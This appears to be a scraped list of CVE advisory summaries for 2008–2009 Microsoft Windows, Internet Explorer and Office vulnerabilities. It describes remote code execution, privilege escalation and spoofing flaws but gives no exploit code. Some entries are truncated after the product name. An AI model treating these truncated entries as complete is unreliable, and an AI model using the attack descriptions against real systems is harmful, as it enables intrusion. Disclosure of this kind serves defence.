[CVE-2009-1544] Double free vulnerability in the Workstation service in Microsoft Windows allows remote authenticated users to gain privileges via a crafted RPC message to a Windows XP SP2 or SP3 or Server 2003 SP2 system, or cause a denial of service via a crafted RPC message to a Vista Gold, SP1, or SP2 or Server 2008 Gold or SP2 system, aka "Workstation Service Memory Corruption Vulnerability." [CVE-2009-1539] The QuickTime Movie Parser Filter in quartz.dll in DirectShow in Microsoft DirectX 7.0 through 9.0c on Windows 2000 SP4, Windows XP SP2 and SP3, and Windows Server 2003 SP2 does not properly validate unspecified size fields in QuickTime media files, which allows remote attackers to execute arbitrary code via a crafted file, aka "DirectX Size Validation Vulnerability." [CVE-2009-1538] The QuickTime Movie Parser Filter in quartz.dll in DirectShow in Microsoft DirectX 7.0 through 9.0c on Windows 2000 SP4, Windows XP SP2 and SP3, and Windows Server 2003 SP2 performs updates to pointers without properly validating unspecified data values, which allows remote attackers to execute arbitrary code via a crafted QuickTime media file, aka "DirectX Pointer Validation Vulnerability." [CVE-2009-1537] Unspecified vulnerability in the QuickTime Movie Parser Filter in quartz.dll in DirectShow in Microsoft DirectX 7.0 through 9.0c on Windows 2000 SP4, Windows XP SP2 and SP3, and Windows Server 2003 SP2 allows remote attackers to execute arbitrary code via a crafted QuickTime media file, as exploited in the wild in May 2009, aka "DirectX NULL Byte Overwrite Vulnerability." [CVE-2009-1533] Buffer overflow in the Works for Windows document converters in Microsoft Office 2000 SP3, Office XP SP3, Office 2003 SP3, Office 2007 SP1, and Works 8.5 and 9 allows remote attackers to execute arbitrary code via a crafted Works .wps file that triggers memory corruption, aka "File Converter Buffer Overflow Vulnerability." [CVE-2009-1532] Microsoft Internet Explorer 8 for Windows XP SP2 and SP3 [CVE-2009-1531] Microsoft Internet Explorer 7 for Windows XP SP2 and SP3 [CVE-2009-1530] Use-after-free vulnerability in Microsoft Internet Explorer 7 for Windows XP SP2 and SP3 [CVE-2009-1529] Microsoft Internet Explorer 7 for Windows XP SP2 and SP3 [CVE-2009-1528] Microsoft Internet Explorer 6 and 7 for Windows XP SP2 and SP3 [CVE-2009-1511] GDI+ in Microsoft Windows XP SP3 allows remote attackers to cause a denial of service (infinite loop) via a PNG file that contains a certain large btChunkLen value. [CVE-2009-1335] Microsoft Internet Explorer 7 and 8 on Windows XP and Vista allows remote attackers to cause a denial of service (application hang) via a large document composed of unprintable characters, aka MSRC 9011jr. [CVE-2009-1331] Integer overflow in Microsoft Windows Media Player (WMP) 11.0.5721.5260 allows remote attackers to cause a denial of service (application crash) via a crafted .mid file, as demonstrated by crash.mid. [CVE-2009-1217] Off-by-one error in the GpFont::SetData function in gdiplus.dll in Microsoft GDI+ on Windows XP allows remote attackers to cause a denial of service (stack corruption and application termination) via a crafted EMF file that triggers an integer overflow, as demonstrated by voltage-exploit.emf, aka the "Microsoft GdiPlus EMF GpFont.SetData integer overflow." [CVE-2009-1216] Multiple unspecified vulnerabilities in (1) unlzh.c and (2) unpack.c in the gzip libraries in Microsoft Windows Server 2008, Windows Services for UNIX 3.0 and 3.5, and the Subsystem for UNIX-based Applications (SUA) [CVE-2009-1141] Microsoft Internet Explorer 6 for Windows XP SP2 and SP3 and Server 2003 SP2 allows remote attackers to execute arbitrary code via unspecified DHTML function calls related to a tr element and the "insertion, deletion and attributes of a table cell," which trigger memory corruption when the window is destroyed, aka "DHTML Object Memory Corruption Vulnerability." [CVE-2009-1139] Memory leak in the LDAP service in Active Directory on Microsoft Windows 2000 SP4 and Server 2003 SP2, and Active Directory Application Mode (ADAM) on Windows XP SP2 and SP3 and Server 2003 SP2, allows remote attackers to cause a denial of service (memory consumption and service outage) via (1) LDAP or (2) LDAPS requests with unspecified OID filters, aka "Active Directory Memory Leak Vulnerability." [CVE-2009-1138] The LDAP service in Active Directory on Microsoft Windows 2000 SP4 does not properly free memory for LDAP and LDAPS requests, which allows remote attackers to execute arbitrary code via a request that uses hexadecimal encoding, whose associated memory is not released, related to a "DN AttributeValue," aka "Active Directory Invalid Free Vulnerability." NOTE: this issue is probably a memory leak. [CVE-2009-1133] Heap-based buffer overflow in Microsoft Remote Desktop Connection (formerly Terminal Services Client) running RDP 5.0 through 6.1 on Windows, and Remote Desktop Connection Client for Mac 2.0, allows remote attackers to execute arbitrary code via unspecified parameters, aka "Remote Desktop Connection Heap Overflow Vulnerability." [CVE-2009-1132] Heap-based buffer overflow in the Wireless LAN AutoConfig Service (aka Wlansvc) in Microsoft Windows Vista Gold, SP1, and SP2 and Server 2008 Gold and SP2 allows remote attackers to execute arbitrary code via a malformed wireless frame, aka "Wireless Frame Parsing Remote Code Execution Vulnerability." [CVE-2009-1127] win32k.sys in the kernel in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP2, Vista Gold, SP1, and SP2, and Server 2008 Gold and SP2 does not correctly validate an argument to an unspecified system call, which allows local users to gain privileges via a crafted application that triggers a NULL pointer dereference, aka "Win32k NULL Pointer Dereferencing Vulnerability." [CVE-2009-1126] The kernel in Microsoft Windows 2000 SP4, XP SP2 and SP3, and Server 2003 SP2 does not properly validate the user-mode input associated with the editing of an unspecified desktop parameter, which allows local users to gain privileges via a crafted application, aka "Windows Desktop Parameter Edit Vulnerability." [CVE-2009-1125] The kernel in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP2, Vista Gold, SP1, and SP2, and Server 2008 SP2 does not properly validate an argument to an unspecified system call, which allows local users to gain privileges via a crafted application, aka "Windows Driver Class Registration Vulnerability." [CVE-2009-1124] The kernel in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP2, Vista Gold, SP1, and SP2, and Server 2008 SP2 does not properly validate user-mode pointers in unspecified error conditions, which allows local users to gain privileges via a crafted application, aka "Windows Kernel Pointer Validation Vulnerability." [CVE-2009-1123] The kernel in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP2, Vista Gold, SP1, and SP2, and Server 2008 SP2 does not properly validate changes to unspecified kernel objects, which allows local users to gain privileges via a crafted application, aka "Windows Kernel Desktop Vulnerability." [CVE-2009-1122] The WebDAV extension in Microsoft Internet Information Services (IIS) 5.0 on Windows 2000 SP4 does not properly decode URLs, which allows remote attackers to bypass authentication, and possibly read or create files, via a crafted HTTP request, aka "IIS 5.0 WebDAV Authentication Bypass Vulnerability," a different vulnerability than CVE-2009-1535. [CVE-2009-1043] Unspecified vulnerability in Microsoft Internet Explorer 8 on Windows 7 allows remote attackers to execute arbitrary code via unknown vectors triggered by clicking on a link, as demonstrated by Nils during a PWN2OWN competition at CanSecWest 2009. [CVE-2009-0568] The RPC Marshalling Engine (aka NDR) in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP2, Vista Gold, SP1, and SP2, and Server 2008 SP2 does not properly maintain its internal state, which allows remote attackers to overwrite arbitrary memory locations via a crafted RPC message that triggers incorrect pointer reading, related to "IDL interfaces containing a non-conformant varying array" and FC_SMVARRAY, FC_LGVARRAY, FC_VARIABLE_REPEAT, and FC_VARIABLE_OFFSET, aka "RPC Marshalling Engine Vulnerability." [CVE-2009-0555] Microsoft Windows Media Runtime, as used in DirectShow WMA Voice Codec, Windows Media Audio Voice Decoder, and Audio Compression Manager (ACM), does not properly process Advanced Systems Format (ASF) files, which allows remote attackers to execute arbitrary code via a crafted audio file that uses the Windows Media Speech codec, aka "Windows Media Runtime Voice Sample Rate Vulnerability." [CVE-2009-0554] Microsoft Internet Explorer 5.01 SP4, 6 SP1, 6 and 7 on Windows XP SP2 and SP3, 6 and 7 on Windows Server 2003 SP1 and SP2, 7 on Windows Vista Gold and SP1, and 7 on Windows Server 2008 allows remote attackers to execute arbitrary code via a web page that triggers presence of an object in memory that was (1) not properly initialized or (2) deleted, aka "Uninitialized Memory Corruption Vulnerability." [CVE-2009-0553] Microsoft Internet Explorer 6 SP1, 6 and 7 on Windows XP SP2 and SP3, 6 and 7 on Windows Server 2003 SP1 and SP2, 7 on Windows Vista Gold and SP1, and 7 on Windows Server 2008 allows remote attackers to execute arbitrary code via a web page that triggers presence of an object in memory that was (1) not properly initialized or (2) deleted, aka "Uninitialized Memory Corruption Vulnerability." [CVE-2009-0552] Unspecified vulnerability in Microsoft Internet Explorer 5.01 SP4, 6 SP1, 6 on Windows XP SP2 and SP3, and 6 on Windows Server 2003 SP1 and SP2 allows remote attackers to execute arbitrary code via a web page that triggers presence of an object in memory that was (1) not properly initialized or (2) deleted, aka "Uninitialized Memory Corruption Vulnerability." [CVE-2009-0551] Microsoft Internet Explorer 6 SP1, 6 and 7 on Windows XP SP2 and SP3, 6 and 7 on Windows Server 2003 SP1 and SP2, 7 on Windows Vista Gold and SP1, and 7 on Windows Server 2008 does not properly handle transition errors in a request for one HTTP document followed by a request for a second HTTP document, which allows remote attackers to execute arbitrary code via vectors involving (1) multiple crafted pages on a web site or (2) a web page with crafted inline content such as banner advertisements, aka "Page Transition Memory Corruption Vulnerability." [CVE-2009-0550] Windows HTTP Services (aka WinHTTP) in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP1 and SP2, Vista Gold and SP1, and Server 2008 [CVE-2009-0341] The shell32 module in Microsoft Internet Explorer 7.0 on Windows XP SP3 might allow remote attackers to execute arbitrary code via a long VALUE attribute in an INPUT element, possibly related to a stack consumption vulnerability. [CVE-2009-0320] Microsoft Windows XP, Server 2003 and 2008, and Vista exposes I/O activity measurements of all processes, which allows local users to obtain sensitive information, as demonstrated by reading the I/O Other Bytes column in Task Manager (aka taskmgr.exe) to estimate the number of characters that a different user entered at a runas.exe password prompt, related to a "benchmarking attack." [CVE-2009-0244] Directory traversal vulnerability in the OBEX FTP Service in the Microsoft Bluetooth stack in Windows Mobile 6 Professional, and probably Windows Mobile 5.0 for Pocket PC and 5.0 for Pocket PC Phone Edition, allows remote authenticated users to list arbitrary directories, and create or read arbitrary files, via a .. (dot dot) in a pathname. NOTE: this can be leveraged for code execution by writing to a Startup folder. [CVE-2009-0243] Microsoft Windows does not properly enforce the Autorun and NoDriveTypeAutoRun registry values, which allows physically proximate attackers to execute arbitrary code by (1) inserting CD-ROM media, (2) inserting DVD media, (3) connecting a USB device, and (4) connecting a Firewire device [CVE-2009-0239] Cross-site scripting (XSS) vulnerability in Windows Search 4.0 for Microsoft Windows XP SP2 and SP3 and Server 2003 SP2 allows user-assisted remote attackers to inject arbitrary web script or HTML via a crafted file that appears in a preview in a search result, aka "Script Execution in Windows Search Vulnerability." [CVE-2009-0235] Stack-based buffer overflow in the Word 97 text converter in WordPad in Microsoft Windows 2000 SP4, XP SP2 and SP3, and Server 2003 SP1 and SP2 allows remote attackers to execute arbitrary code via a crafted Word 97 file that triggers memory corruption, related to use of inconsistent integer data sizes for an unspecified length field, aka "WordPad Word 97 Text Converter Stack Overflow Vulnerability." [CVE-2009-0234] The DNS Resolver Cache Service (aka DNSCache) in Windows DNS Server in Microsoft Windows 2000 SP4, Server 2003 SP1 and SP2, and Server 2008 does not properly cache crafted DNS responses, which makes it easier for remote attackers to predict transaction IDs and poison caches by sending many crafted DNS queries that trigger "unnecessary lookups," aka "DNS Server Response Validation Vulnerability." [CVE-2009-0233] The DNS Resolver Cache Service (aka DNSCache) in Windows DNS Server in Microsoft Windows 2000 SP4, Server 2003 SP1 and SP2, and Server 2008, when dynamic updates are enabled, does not reuse cached DNS responses in all applicable situations, which makes it easier for remote attackers to predict transaction IDs and poison caches by simultaneously sending crafted DNS queries and responses, aka "DNS Server Query Validation Vulnerability." [CVE-2009-0232] Integer overflow in the Embedded OpenType (EOT) Font Engine in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP2, Vista Gold, SP1, and SP2, and Server 2008 Gold and SP2 allows remote attackers to execute arbitrary code via a crafted name table, aka "Embedded OpenType Font Integer Overflow Vulnerability." [CVE-2009-0231] The Embedded OpenType (EOT) Font Engine (T2EMBED.DLL) in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP2, Vista Gold, SP1, and SP2, and Server 2008 Gold and SP2 allows remote attackers to execute arbitrary code via a crafted name table in a data record that triggers an integer truncation and a heap-based buffer overflow, aka "Embedded OpenType Font Heap Overflow Vulnerability." [CVE-2009-0230] The Windows Print Spooler in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP2, Vista Gold, SP1, and SP2, and Server 2008 SP2 allows remote authenticated users to gain privileges via a crafted RPC message that triggers loading of a DLL file from an arbitrary directory, aka "Print Spooler Load Library Vulnerability." [CVE-2009-0229] The Windows Printing Service in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP2, Vista Gold, SP1, and SP2, and Server 2008 SP2 allows local users to read arbitrary files via a crafted separator page, aka "Print Spooler Read File Vulnerability." [CVE-2009-0228] Stack-based buffer overflow in the EnumeratePrintShares function in Windows Print Spooler Service (win32spl.dll) in Microsoft Windows 2000 SP4 allows remote printer servers to execute arbitrary code via a a crafted ShareName in a response to an RPC request, related to "printing data structures," aka "Buffer Overflow in Print Spooler Vulnerability." [CVE-2009-0202] Array index error in FL21WIN.DLL in the PowerPoint Freelance Windows 2.1 Translator in Microsoft PowerPoint 2000 and 2002 allows remote attackers to execute arbitrary code via a Freelance file with unspecified "layout information" that triggers a heap-based buffer overflow. [CVE-2009-0119] Buffer overflow in Microsoft Windows XP SP3 allows remote attackers to cause a denial of service (memory corruption and application crash) or possibly execute arbitrary code via a crafted .chm file. [CVE-2009-0094] The WINS server in Microsoft Windows 2000 SP4 and Server 2003 SP1 and SP2 does not restrict registration of the (1) "wpad" and (2) "isatap" NetBIOS names, which allows remote authenticated users to hijack the Web Proxy Auto-Discovery (WPAD) and Intra-Site Automatic Tunnel Addressing Protocol (ISATAP) features, and conduct man-in-the-middle attacks by spoofing a proxy server or ISATAP route, by registering one of these names in the WINS database, aka "WPAD WINS Server Registration Vulnerability," a related issue to CVE-2007-1692. [CVE-2009-0093] Windows DNS Server in Microsoft Windows 2000 SP4, Server 2003 SP1 and SP2, and Server 2008, when dynamic updates are enabled, does not restrict registration of the "wpad" hostname, which allows remote authenticated users to hijack the Web Proxy Auto-Discovery (WPAD) feature, and conduct man-in-the-middle attacks by spoofing a proxy server, via a Dynamic Update request for this hostname, aka "DNS Server Vulnerability in WPAD Registration Vulnerability," a related issue to CVE-2007-1692. [CVE-2009-0089] Windows HTTP Services (aka WinHTTP) in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP1 and SP2, and Vista Gold allows remote web servers to impersonate arbitrary https web sites by using DNS spoofing to "forward a connection" to a different https web site that has a valid certificate matching its own domain name, but not a certificate matching the domain name of the host requested by the user, aka "Windows HTTP Services Certificate Name Mismatch Vulnerability." [CVE-2009-0087] Unspecified vulnerability in the Word 6 text converter in WordPad in Microsoft Windows 2000 SP4, XP SP2 and SP3, and Server 2003 SP1 and SP2 [CVE-2009-0086] Integer underflow in Windows HTTP Services (aka WinHTTP) in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP1 and SP2, Vista Gold and SP1, and Server 2008 allows remote HTTP servers to execute arbitrary code via crafted parameter values in a response, related to error handling, aka "Windows HTTP Services Integer Underflow Vulnerability." [CVE-2009-0085] The Secure Channel (aka SChannel) authentication component in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP1 and SP2, Vista Gold and SP1, and Server 2008, when certificate authentication is used, does not properly validate the client's key exchange data in Transport Layer Security (TLS) handshake messages, which allows remote attackers to spoof authentication by crafting a TLS packet based on knowledge of the certificate but not the private key, aka "SChannel Spoofing Vulnerability." [CVE-2009-0083] The kernel in Microsoft Windows 2000 SP4, XP SP2 and SP3, and Server 2003 SP1 does not properly handle invalid pointers, which allows local users to gain privileges via an application that triggers use of a crafted pointer, aka "Windows Kernel Invalid Pointer Vulnerability." [CVE-2009-0082] The kernel in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP1 and SP2, Vista Gold and SP1, and Server 2008 does not properly validate handles, which allows local users to gain privileges via a crafted application that triggers unspecified "actions," aka "Windows Kernel Handle Validation Vulnerability." [CVE-2009-0081] The graphics device interface (GDI) implementation in the kernel in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP1 and SP2, Vista Gold and SP1, and Server 2008 does not properly validate input received from user mode, which allows remote attackers to execute arbitrary code via a crafted (1) Windows Metafile (aka WMF) or (2) Enhanced Metafile (aka EMF) image file, aka "Windows Kernel Input Validation Vulnerability." [CVE-2009-0079] The RPCSS service in Microsoft Windows XP SP2 and SP3 and Server 2003 SP1 and SP2 does not properly implement isolation among a set of distinct processes that (1) all run under the NetworkService account or (2) all run under the LocalService account, which allows local users to gain privileges by accessing the resources of one of the processes, aka "Windows RPCSS Service Isolation Vulnerability." [CVE-2009-0078] The Windows Management Instrumentation (WMI) provider in Microsoft Windows XP SP2 and SP3, Server 2003 SP1 and SP2, Vista Gold and SP1, and Server 2008 does not properly implement isolation among a set of distinct processes that (1) all run under the NetworkService account or (2) all run under the LocalService account, which allows local users to gain privileges by accessing the resources of one of the processes, aka "Windows WMI Service Isolation Vulnerability." [CVE-2008-6819] win32k.sys in Microsoft Windows Server 2003 and Vista allows local users to cause a denial of service (system crash) via vectors related to CreateWindow, TranslateMessage, and DispatchMessage, possibly a race condition between threads, a different vulnerability than CVE-2008-1084. NOTE: some of these details are obtained from third party information. [CVE-2008-6194] Memory leak in the DNS server in Microsoft Windows allows remote attackers to cause a denial of service (memory consumption) via DNS packets. NOTE: this issue reportedly exists because of an incorrect fix for CVE-2007-3898. [CVE-2008-5828] Microsoft Windows Live Messenger Client 8.5.1 and earlier, when MSN Protocol Version 15 (MSNP15) is used over a NAT session, allows remote attackers to discover intranet IP addresses and port numbers by reading the (1) IPv4InternalAddrsAndPorts, (2) IPv4Internal-Addrs, and (3) IPv4Internal-Port header fields. [CVE-2008-5823] An ActiveX control in prtstb06.dll in Microsoft Money 2006, when used with WScript in Windows Script Host (WSH) on Windows Vista, allows remote attackers to cause a denial of service (access violation and application crash) via a zero value for the Startup property. [CVE-2008-5750] Argument injection vulnerability in Microsoft Internet Explorer 8 beta 2 on Windows XP SP3 allows remote attackers to execute arbitrary commands via the --renderer-path option in a chromehtml: URI. [CVE-2008-5745] Integer overflow in quartz.dll in the DirectShow framework in Microsoft Windows Media Player (WMP) 9, 10, and 11, including 11.0.5721.5260, allows remote attackers to cause a denial of service (application crash) via a crafted (1) WAV, (2) SND, or (3) MID file. NOTE: this has been incorrectly reported as a code-execution vulnerability. NOTE: it is not clear whether this issue is related to CVE-2008-4927. [CVE-2008-5232] Buffer overflow in the CallHTMLHelp method in the Microsoft Windows Media Services ActiveX control in nskey.dll 4.1.00.3917 in Windows Media Services on Microsoft Windows NT and 2000, and Avaya Media and Message Application servers, allows remote attackers to execute arbitrary code via a long argument. NOTE: the provenance of this information is unknown [CVE-2008-5229] Stack-based buffer overflow in Microsoft Device IO Control in iphlpapi.dll in Microsoft Windows Vista Gold and SP1 allows local users in the Network Configuration Operator group to gain privileges or cause a denial of service (system crash) via a large invalid PrefixLength to the CreateIpForwardEntry2 method, as demonstrated by a "route add" command. NOTE: this issue might not cross privilege boundaries. [CVE-2008-5179] Unspecified vulnerability in Microsoft Office Communications Server (OCS), Office Communicator, and Windows Live Messenger allows remote attackers to cause a denial of service (crash) via a crafted Real-time Transport Control Protocol (RTCP) receiver report packet. [CVE-2008-5112] The LDAP server in Active Directory in Microsoft Windows 2000 SP4 and Server 2003 SP1 and SP2 responds differently to a failed bind attempt depending on whether the user account exists and is permitted to login, which allows remote attackers to enumerate valid usernames via a series of LDAP bind requests, as demonstrated by ldapuserenum. [CVE-2008-5044] Race condition in Microsoft Windows Server 2003 and Vista allows local users to cause a denial of service (crash or hang) via a multi-threaded application that makes many calls to UnhookWindowsHookEx while certain other desktop activity is occurring. [CVE-2008-4927] Microsoft Windows Media Player (WMP) 9.0 through 11 allows user-assisted attackers to cause a denial of service (application crash) via a malformed (1) MIDI or (2) DAT file, related to "MThd Header Parsing." NOTE: the provenance of this information is unknown [CVE-2008-4841] The WordPad Text Converter for Word 97 files in Microsoft Windows 2000 SP4, XP SP2, and Server 2003 SP1 and SP2 allows remote attackers to execute arbitrary code via a crafted (1) .doc, (2) .wri, or (3) .rtf Word 97 file that triggers memory corruption, as exploited in the wild in December 2008. NOTE: As of 20081210, it is unclear whether this vulnerability is related to a WordPad issue disclosed on 20080925 with a 2008-crash.doc.rar example, but there are insufficient details to be sure. [CVE-2008-4835] SMB in the Server service in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP1 and SP2, Vista Gold and SP1, and Server 2008 allows remote attackers to execute arbitrary code via malformed values of unspecified "fields inside the SMB packets" in an NT Trans2 request, related to "insufficiently validating the buffer size," aka "SMB Validation Remote Code Execution Vulnerability." [CVE-2008-4834] Buffer overflow in SMB in the Server service in Microsoft Windows 2000 SP4, XP SP2 and SP3, and Server 2003 SP1 and SP2 allows remote attackers to execute arbitrary code via malformed values of unspecified "fields inside the SMB packets" in an NT Trans request, aka "SMB Buffer Overflow Remote Code Execution Vulnerability." [CVE-2008-4609] The TCP implementation in (1) Linux, (2) platforms based on BSD Unix, (3) Microsoft Windows, (4) Cisco products, and probably other operating systems allows remote attackers to cause a denial of service (connection queue exhaustion) via multiple vectors that manipulate information in the TCP state table, as demonstrated by sockstress. [CVE-2008-4510] Microsoft Windows Vista Home and Ultimate Edition SP1 and earlier allows local users to cause a denial of service (page fault and system crash) via multiple attempts to access a virtual address in a PAGE_NOACCESS memory page. [CVE-2008-4327] gdiplus.dll in GDI+ in Microsoft Windows XP SP3 does not properly handle crafted .ico files, which allows remote attackers to cause a denial of service (divide-by-zero error and application crash) via a certain crash.ico file on a web site, and allows user-assisted attackers to cause a denial of service (divide-by-zero error and persistent application crash) via this crash.ico file on the desktop, a different vulnerability than CVE-2007-2237. [CVE-2008-4323] Windows Explorer in Microsoft Windows XP SP3 allows user-assisted attackers to cause a denial of service (application crash) via a crafted .ZIP file. [CVE-2008-4295] Microsoft Windows Mobile 6.0 on HTC Wiza 200 and HTC MDA 8125 devices does not properly handle the first attempt to establish a Bluetooth connection to a peer with a long name, which allows remote attackers to cause a denial of service (device reboot) by configuring a Bluetooth device with a long hci name and (1) connecting directly to the Windows Mobile system or (2) waiting for the Windows Mobile system to scan for nearby devices. [CVE-2008-4269] The search-ms protocol handler in Windows Explorer in Microsoft Windows Vista Gold and SP1 and Server 2008 uses untrusted parameter data obtained from incorrect parsing, which allows remote attackers to execute arbitrary code via a crafted HTML document, aka "Windows Search Parsing Vulnerability." [CVE-2008-4268] The Windows Search component in Microsoft Windows Vista Gold and SP1 and Server 2008 does not properly free memory during a save operation for a Windows Search file, which allows remote attackers to execute arbitrary code via a crafted saved-search file, aka "Windows Saved Search Vulnerability." [CVE-2008-4261] Stack-based buffer overflow in Microsoft Internet Explorer 5.01 SP4, 6 SP1 on Windows 2000, and 6 on Windows XP and Server 2003 does not properly handle extraneous data associated with an object embedded in a web page, which allows remote attackers to execute arbitrary code via crafted HTML tags that trigger memory corruption, aka "HTML Rendering Memory Corruption Vulnerability." [CVE-2008-4255] Heap-based buffer overflow in mscomct2.ocx (aka Windows Common ActiveX control or Microsoft Animation ActiveX control) in Microsoft Visual Basic 6.0, Visual Studio .NET 2002 SP1 and 2003 SP1, Visual FoxPro 8.0 SP1 and 9.0 SP1 and SP2, and Office Project 2003 SP3 and 2007 Gold and SP1 allows remote attackers to execute arbitrary code via an AVI file with a crafted stream length, which triggers an "allocation error" and memory corruption, aka "Windows Common AVI Parsing Overflow Vulnerability." [CVE-2008-4250] The Server service in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP1 and SP2, Vista Gold and SP1, Server 2008, and 7 Pre-Beta allows remote attackers to execute arbitrary code via a crafted RPC request that triggers the overflow during path canonicalization, as exploited in the wild by Gimmiv.A in October 2008, aka "Server Service Vulnerability." [CVE-2008-4127] Mshtml.dll in Microsoft Internet Explorer 7 Gold 7.0.5730 and 8 Beta 8.0.6001 on Windows XP SP2 allows remote attackers to cause a denial of service (failure of subsequent image rendering) via a crafted PNG file, related to an infinite loop in the CDwnTaskExec::ThreadExec function. [CVE-2008-4114] srv.sys in the Server service in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP1 and SP2, Vista Gold and SP1, and Server 2008 allows remote attackers to cause a denial of service (system crash) or possibly have unspecified other impact via an SMB WRITE_ANDX packet with an offset that is inconsistent with the packet size, related to "insufficiently validating the buffer size," as demonstrated by a request to the \PIPE\lsarpc named pipe, aka "SMB Validation Denial of Service Vulnerability." [CVE-2008-4071] A certain ActiveX control in Adobe Acrobat 9, when used with Microsoft Windows Vista and Internet Explorer 7, allows remote attackers to cause a denial of service (browser crash) via an src property value with an invalid acroie:// URL. [CVE-2008-4038] Buffer underflow in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP1 and SP2, Vista Gold and SP1, and Server 2008 allows remote attackers to execute arbitrary code via a Server Message Block (SMB) request that contains a filename with a crafted length, aka "SMB Buffer Underflow Vulnerability." [CVE-2008-4037] Microsoft Windows 2000 Gold through SP4, XP Gold through SP3, Server 2003 SP1 and SP2, Vista Gold and SP1, and Server 2008 allows remote SMB servers to execute arbitrary code on a client machine by replaying the NTLM credentials of a client user, as demonstrated by backrush, aka "SMB Credential Reflection Vulnerability." NOTE: some reliable sources report that this vulnerability exists because of an insufficient fix for CVE-2000-0834. [CVE-2008-4036] Integer overflow in Memory Manager in Microsoft Windows XP SP2 and SP3, Server 2003 SP1 and SP2, Vista Gold and SP1, and Server 2008 allows local users to gain privileges via a crafted application that triggers an erroneous decrement of a variable, related to validation of parameters for Virtual Address Descriptors (VADs) and a "memory allocation mapping error," aka "Virtual Address Descriptor Elevation of Privilege Vulnerability." [CVE-2008-4023] Active Directory in Microsoft Windows 2000 SP4 does not properly allocate memory for (1) LDAP and (2) LDAPS requests, which allows remote attackers to execute arbitrary code via a crafted request, aka "Active Directory Overflow Vulnerability." [CVE-2008-3957] The Microsoft Windows Image Acquisition Logger ActiveX control allows remote attackers to force the download of arbitrary files onto a client system via a URL in the first argument to the Open method, in conjunction with a full destination pathname in the first argument to the Save method. NOTE: the provenance of this information is unknown [CVE-2008-3893] Microsoft Bitlocker in Windows Vista before SP1 stores pre-boot authentication passwords in the BIOS Keyboard buffer and does not clear this buffer during boot, which allows local users to obtain sensitive information by reading the physical memory locations associated with this buffer. [CVE-2008-3815] Unspecified vulnerability in Cisco Adaptive Security Appliances (ASA) 5500 Series and PIX Security Appliances 7.0 before 7.0(8)3, 7.1 before 7.1(2)78, 7.2 before 7.2(4)16, 8.0 before 8.0(4)6, and 8.1 before 8.1(1)13, when configured as a VPN using Microsoft Windows NT Domain authentication, allows remote attackers to bypass VPN authentication via unknown vectors. [CVE-2008-3648] nslookup.exe in Microsoft Windows XP SP2 allows user-assisted remote attackers to execute arbitrary code, as demonstrated by an attempted DNS zone transfer, and as exploited in the wild in August 2008. [CVE-2008-3636] Integer overflow in the IopfCompleteRequest API in the kernel in Microsoft Windows 2000, XP, Server 2003, and Vista allows context-dependent attackers to gain privileges. NOTE: this issue was originally reported for GEARAspiWDM.sys 2.0.7.5 in Gear Software CD DVD Filter driver before 4.001.7, as used in other products including Apple iTunes and multiple Symantec and Norton products, which allows local users to gain privileges via repeated IoAttachDevice IOCTL calls to \\.\GEARAspiWDMDevice in this GEARAspiWDM.sys. However, the root cause is the integer overflow in the API call itself. [CVE-2008-3479] Heap-based buffer overflow in the Microsoft Message Queuing (MSMQ) service (mqsvc.exe) in Microsoft Windows 2000 SP4 allows remote attackers to read memory contents and execute arbitrary code via a crafted RPC call, related to improper processing of parameters to string APIs, aka "Message Queuing Service Remote Code Execution Vulnerability." [CVE-2008-3465] Heap-based buffer overflow in an API in GDI in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP1 and SP2, Vista Gold and SP1, and Server 2008 allows context-dependent attackers to cause a denial of service or execute arbitrary code via a WMF file with a malformed file-size parameter, which would not be properly handled by a third-party application that uses this API for a copy operation, aka "GDI Heap Overflow Vulnerability." [CVE-2008-3464] afd.sys in the Ancillary Function Driver (AFD) component in Microsoft Windows XP SP2 and SP3 and Windows Server 2003 SP1 and SP2 does not properly validate input sent from user mode to the kernel, which allows local users to gain privileges via a crafted application, as demonstrated using crafted pointers and lengths that bypass intended ProbeForRead and ProbeForWrite restrictions, aka "AFD Kernel Overwrite Vulnerability." [CVE-2008-3068] Microsoft Crypto API 5.131.2600.2180 through 6.0, as used in Outlook, Windows Live Mail, and Office 2007, performs Certificate Revocation List (CRL) checks by using an arbitrary URL from a certificate embedded in a (1) S/MIME e-mail message or (2) signed document, which allows remote attackers to obtain reading times and IP addresses of recipients, and port-scan results, via a crafted certificate with an Authority Information Access (AIA) extension. [CVE-2008-3014] Buffer overflow in gdiplus.dll in GDI+ in Microsoft Internet Explorer 6 SP1, Windows XP SP2 and SP3, Server 2003 SP1 and SP2, Vista Gold and SP1, Server 2008, Office XP SP3, Office 2003 SP2 and SP3, 2007 Microsoft Office System Gold and SP1, Visio 2002 SP2, PowerPoint Viewer 2003, Works 8, Digital Image Suite 2006, SQL Server 2000 Reporting Services SP2, SQL Server 2005 SP2, Report Viewer 2005 SP1 and 2008, and Forefront Client Security 1.0 allows remote attackers to execute arbitrary code via a malformed WMF image file that triggers improper memory allocation, aka "GDI+ WMF Buffer Overrun Vulnerability." [CVE-2008-3013] gdiplus.dll in GDI+ in Microsoft Internet Explorer 6 SP1, Windows XP SP2 and SP3, Server 2003 SP1 and SP2, Vista Gold and SP1, Server 2008, Office XP SP3, Office 2003 SP2 and SP3, 2007 Microsoft Office System Gold and SP1, Visio 2002 SP2, PowerPoint Viewer 2003, Works 8, Digital Image Suite 2006, SQL Server 2000 